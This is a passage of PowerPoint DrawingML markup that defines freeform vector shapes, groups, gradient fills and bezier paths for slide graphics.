                        <a:pt x="43" y="149"/>
                        <a:pt x="43" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="130"/>
                        <a:pt x="42" y="102"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="73"/>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="68"/>
                        <a:pt x="42" y="66"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="65"/>
                        <a:pt x="42" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="63"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="50"/>
                        <a:pt x="48" y="44"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="37"/>
                        <a:pt x="101" y="30"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="28"/>
                        <a:pt x="107" y="28"/>
                        <a:pt x="103" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="30"/>
                        <a:pt x="68" y="37"/>
                        <a:pt x="59" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="48" y="44"/>
                        <a:pt x="43" y="50"/>
                        <a:pt x="42" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="64"/>
                        <a:pt x="42" y="70"/>
                        <a:pt x="42" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="71"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="72"/>
                        <a:pt x="42" y="74"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="42" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="42" y="154"/>
                        <a:pt x="43" y="154"/>
                        <a:pt x="43" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="155"/>
                        <a:pt x="43" y="156"/>
                        <a:pt x="43" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="180"/>
                        <a:pt x="84" y="177"/>
                        <a:pt x="84" y="157"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84" y="142"/>
                        <a:pt x="85" y="80"/>
                        <a:pt x="85" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="74"/>
                        <a:pt x="87" y="70"/>
                        <a:pt x="89" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="91" y="69"/>
                        <a:pt x="136" y="57"/>
                        <a:pt x="141" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="153" y="52"/>
                        <a:pt x="159" y="47"/>
                        <a:pt x="159" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                        <a:pt x="159" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="7"/>
                        <a:pt x="159" y="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4074"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="004074">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="004074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88" name="Oval 1121">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98238096-38B3-4224-BC5D-9F4A7B1035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flipH="1">
                  <a:off x="2043" y="1822"/>
                  <a:ext cx="51" cy="52"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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89" name="Freeform 1122">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58822356-0810-4C1E-A5E5-266708986E7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056" y="1888"/>
                  <a:ext cx="16" cy="76"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 55"/>
                    <a:gd name="T1" fmla="*/ 0 h 265"/>
                    <a:gd name="T2" fmla="*/ 14 w 55"/>
                    <a:gd name="T3" fmla="*/ 22 h 265"/>
                    <a:gd name="T4" fmla="*/ 5 w 55"/>
                    <a:gd name="T5" fmla="*/ 239 h 265"/>
                    <a:gd name="T6" fmla="*/ 29 w 55"/>
                    <a:gd name="T7" fmla="*/ 265 h 265"/>
                    <a:gd name="T8" fmla="*/ 52 w 55"/>
                    <a:gd name="T9" fmla="*/ 253 h 265"/>
                    <a:gd name="T10" fmla="*/ 38 w 55"/>
                    <a:gd name="T11" fmla="*/ 29 h 265"/>
                    <a:gd name="T12" fmla="*/ 55 w 55"/>
                    <a:gd name="T13" fmla="*/ 15 h 265"/>
                    <a:gd name="T14" fmla="*/ 0 w 55"/>
                    <a:gd name="T15" fmla="*/ 0 h 2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5" h="265">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="239"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="29" y="265"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="253"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="29"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5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40505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6350" cap="flat" cmpd="sng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90" name="Freeform 1123">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{942BCB4E-9AF0-4E18-9EF0-A9792306EDA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052" y="1946"/>
                  <a:ext cx="59" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 28 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="8"/>
                        <a:pt x="28" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="66" y="38"/>
                        <a:pt x="91" y="32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FFFF"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="FFFFFF">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF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58" name="Group 1124">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FE50D20-7BFD-4D3F-8C5F-04879E9C14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2253" y="2535"/>
                <a:ext cx="428" cy="229"/>
                <a:chOff x="786" y="2382"/>
                <a:chExt cx="1190" cy="634"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="773" name="Freeform 1125">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B726970B-1F84-4D46-81D2-E4CCE0E1CDC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933" y="2464"/>
                  <a:ext cx="43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74" name="Freeform 1126">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{089D5D7E-4E57-43ED-9043-5B382B3D7B5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888" y="2464"/>
                  <a:ext cx="45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75" name="Freeform 1127">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0985375-F25A-4AD8-A6E6-02618332D66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038" y="2694"/>
                  <a:ext cx="46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4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76" name="Freeform 1128">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DD7D78D-F1F4-46FA-8BA0-B871E50B9F5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084" y="2694"/>
                  <a:ext cx="42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77" name="Freeform 1129">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F8AAFB-0E26-40D5-99F6-C9F33321919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786" y="2625"/>
                  <a:ext cx="45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78" name="Freeform 1130">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06FC1F10-CF0A-435E-9F9A-1EB53A90206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831" y="2625"/>
                  <a:ext cx="43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79" name="Freeform 1131">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE9E7095-BDFC-44D1-8937-05176CCDE43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33" y="2382"/>
                  <a:ext cx="42" cy="325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Freeform 1132">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{777093D7-B205-420B-9167-B19766942D6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33" y="2394"/>
                  <a:ext cx="42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4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81" name="Freeform 1133">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB020B75-BCB9-4041-8759-1E552CEFD97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675" y="2394"/>
                  <a:ext cx="46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82" name="Freeform 1134">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C70BEE6-5C8A-4C94-9B49-9492D07754B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786" y="2382"/>
                  <a:ext cx="1190" cy="325"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 321"/>
                    <a:gd name="T1" fmla="*/ 65 h 87"/>
                    <a:gd name="T2" fmla="*/ 160 w 321"/>
                    <a:gd name="T3" fmla="*/ 22 h 87"/>
                    <a:gd name="T4" fmla="*/ 160 w 321"/>
                    <a:gd name="T5" fmla="*/ 22 h 87"/>
                    <a:gd name="T6" fmla="*/ 240 w 321"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 321 w 321"/>
                    <a:gd name="T9" fmla="*/ 22 h 87"/>
                    <a:gd name="T10" fmla="*/ 240 w 321"/>
                    <a:gd name="T11" fmla="*/ 44 h 87"/>
                    <a:gd name="T12" fmla="*/ 240 w 321"/>
                    <a:gd name="T13" fmla="*/ 44 h 87"/>
                    <a:gd name="T14" fmla="*/ 81 w 321"/>
                    <a:gd name="T15" fmla="*/ 87 h 87"/>
                    <a:gd name="T16" fmla="*/ 0 w 321"/>
                    <a:gd name="T17" fmla="*/ 6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21" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="160" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="240" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="87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8E47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83" name="Freeform 1135">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{749E5B8B-8E98-4B0F-BDC1-F219F7F2EB5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084" y="2464"/>
                  <a:ext cx="892" cy="285"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 241"/>
                    <a:gd name="T1" fmla="*/ 65 h 77"/>
                    <a:gd name="T2" fmla="*/ 0 w 241"/>
                    <a:gd name="T3" fmla="*/ 77 h 77"/>
                    <a:gd name="T4" fmla="*/ 241 w 241"/>
                    <a:gd name="T5" fmla="*/ 12 h 77"/>
                    <a:gd name="T6" fmla="*/ 241 w 241"/>
                    <a:gd name="T7" fmla="*/ 0 h 77"/>
                    <a:gd name="T8" fmla="*/ 0 w 241"/>
                    <a:gd name="T9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1" h="77">
                      <a:moveTo>
                        <a:pt x="0" y="65"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241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84" name="Freeform 1136">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F948E526-C278-4790-80DE-D9F2AA7FEC0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786" y="2625"/>
                  <a:ext cx="298" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 80"/>
                    <a:gd name="T1" fmla="*/ 0 h 34"/>
                    <a:gd name="T2" fmla="*/ 0 w 80"/>
                    <a:gd name="T3" fmla="*/ 13 h 34"/>
                    <a:gd name="T4" fmla="*/ 80 w 80"/>
                    <a:gd name="T5" fmla="*/ 34 h 34"/>
                    <a:gd name="T6" fmla="*/ 80 w 80"/>
                    <a:gd name="T7" fmla="*/ 22 h 34"/>
                    <a:gd name="T8" fmla="*/ 0 w 80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0" h="34">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="34"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="80" y="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59" name="Freeform 1137">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3443A8B4-FE9A-4297-8AF4-9A6E7923F56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460" y="2592"/>
                <a:ext cx="158" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 668 w 668"/>
                  <a:gd name="T1" fmla="*/ 76 h 177"/>
                  <a:gd name="T2" fmla="*/ 377 w 668"/>
                  <a:gd name="T3" fmla="*/ 0 h 177"/>
                  <a:gd name="T4" fmla="*/ 0 w 668"/>
                  <a:gd name="T5" fmla="*/ 102 h 177"/>
                  <a:gd name="T6" fmla="*/ 288 w 668"/>
                  <a:gd name="T7" fmla="*/ 177 h 177"/>
                  <a:gd name="T8" fmla="*/ 668 w 668"/>
                  <a:gd name="T9" fmla="*/ 76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8" h="177">
                    <a:moveTo>
                      <a:pt x="668" y="76"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="377" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="7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760" name="Group 1138">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE7BF168-835C-43DF-9F8C-5F59E9683A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3" y="2511"/>
                <a:ext cx="133" cy="89"/>
                <a:chOff x="1859" y="2279"/>
                <a:chExt cx="372" cy="247"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="766" name="Freeform 1139">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299EF813-CEF8-4580-AC0B-03A205892A6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859" y="2412"/>
                  <a:ext cx="372" cy="100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 25173"/>
                    <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T3" fmla="*/ 0 h 6756"/>
                    <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                    <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                    <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                    <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                    <a:gd name="T8" fmla="*/ 0 w 25173"/>
                    <a:gd name="T9" fmla="*/ 3378 h 67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173" h="6756">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25173" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="6756"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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67" name="Freeform 1140">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C24D4A02-8CBF-44BB-B5D0-DDBE749A3BA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045" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12588"/>
                    <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12588"/>
                    <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T5" fmla="*/ 964 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                    <a:gd name="T7" fmla="*/ 0 h 4342"/>
                    <a:gd name="T8" fmla="*/ 0 w 12588"/>
                    <a:gd name="T9" fmla="*/ 3378 h 43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588" h="4342">
                      <a:moveTo>
                        <a:pt x="0" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12588" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3378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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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68" name="Freeform 1141">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEF73733-9858-4AC9-B610-F8725E52563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859" y="2462"/>
                  <a:ext cx="186" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 964 h 4342"/>
                    <a:gd name="T4" fmla="*/ 0 w 12585"/>
                    <a:gd name="T5" fmla="*/ 0 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T9" fmla="*/ 4342 h 43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585" h="4342">
                      <a:moveTo>
                        <a:pt x="12585" y="4342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="43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69" name="Freeform 1142">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9698CB97-DB1D-4916-98EE-F319B83D60C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912" y="2428"/>
                  <a:ext cx="252" cy="68"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17020"/>
                    <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                    <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                    <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                    <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                    <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                    <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                    <a:gd name="T7" fmla="*/ 0 h 4567"/>
                    <a:gd name="T8" fmla="*/ 0 w 17020"/>
                    <a:gd name="T9" fmla="*/ 1711 h 45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020" h="4567">
                      <a:moveTo>
                        <a:pt x="0" y="1711"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="10647" y="4567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17020" y="2859"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1711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70" name="Freeform 1143">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2421DD9F-D5F9-4B41-BCA3-053820B17D4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859" y="2283"/>
                  <a:ext cx="186" cy="243"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12585"/>
                    <a:gd name="T1" fmla="*/ 0 h 16411"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 13033 h 16411"/>
                    <a:gd name="T4" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T5" fmla="*/ 16411 h 16411"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 16411"/>
                    <a:gd name="T8" fmla="*/ 0 w 12585"/>
                    <a:gd name="T9" fmla="*/ 0 h 16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585" h="16411">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13033"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="16411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="337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71" name="Freeform 1144">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F886297-1474-4635-AA10-1BEF6B818F1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045" y="2329"/>
                  <a:ext cx="14" cy="197"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 971"/>
                    <a:gd name="T1" fmla="*/ 13293 h 13293"/>
                    <a:gd name="T2" fmla="*/ 971 w 971"/>
                    <a:gd name="T3" fmla="*/ 13030 h 13293"/>
                    <a:gd name="T4" fmla="*/ 971 w 971"/>
                    <a:gd name="T5" fmla="*/ 0 h 13293"/>
                    <a:gd name="T6" fmla="*/ 0 w 971"/>
                    <a:gd name="T7" fmla="*/ 260 h 13293"/>
                    <a:gd name="T8" fmla="*/ 0 w 971"/>
                    <a:gd name="T9" fmla="*/ 13293 h 132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71" h="13293">
                      <a:moveTo>
                        <a:pt x="0" y="13293"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="971" y="13030"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="13293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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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72" name="Freeform 1145">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B916C6-7432-45E0-9A90-3D231E4887D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859" y="2279"/>
                  <a:ext cx="200" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T1" fmla="*/ 3378 h 3638"/>
                    <a:gd name="T2" fmla="*/ 12585 w 13556"/>
                    <a:gd name="T3" fmla="*/ 3638 h 3638"/>
                    <a:gd name="T4" fmla="*/ 0 w 13556"/>
                    <a:gd name="T5" fmla="*/ 260 h 3638"/>
                    <a:gd name="T6" fmla="*/ 971 w 13556"/>
                    <a:gd name="T7" fmla="*/ 0 h 3638"/>
                    <a:gd name="T8" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T9" fmla="*/ 3378 h 36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56" h="3638">
                      <a:moveTo>
                        <a:pt x="13556" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3638"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13556" y="3378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61" name="Group 1146">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A08334F-E83C-4CEF-AFD8-B2C49F4AA5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20" y="2422"/>
                <a:ext cx="131" cy="315"/>
                <a:chOff x="3736" y="1032"/>
                <a:chExt cx="266" cy="635"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="762" name="Freeform 1147">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DEF1137-BF02-4303-B205-A2A7208B137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03" y="1338"/>
                  <a:ext cx="121" cy="329"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 90"/>
                    <a:gd name="T1" fmla="*/ 156 h 245"/>
                    <a:gd name="T2" fmla="*/ 90 w 90"/>
                    <a:gd name="T3" fmla="*/ 7 h 245"/>
                    <a:gd name="T4" fmla="*/ 89 w 90"/>
                    <a:gd name="T5" fmla="*/ 5 h 245"/>
                    <a:gd name="T6" fmla="*/ 63 w 90"/>
                    <a:gd name="T7" fmla="*/ 20 h 245"/>
                    <a:gd name="T8" fmla="*/ 12 w 90"/>
                    <a:gd name="T9" fmla="*/ 10 h 245"/>
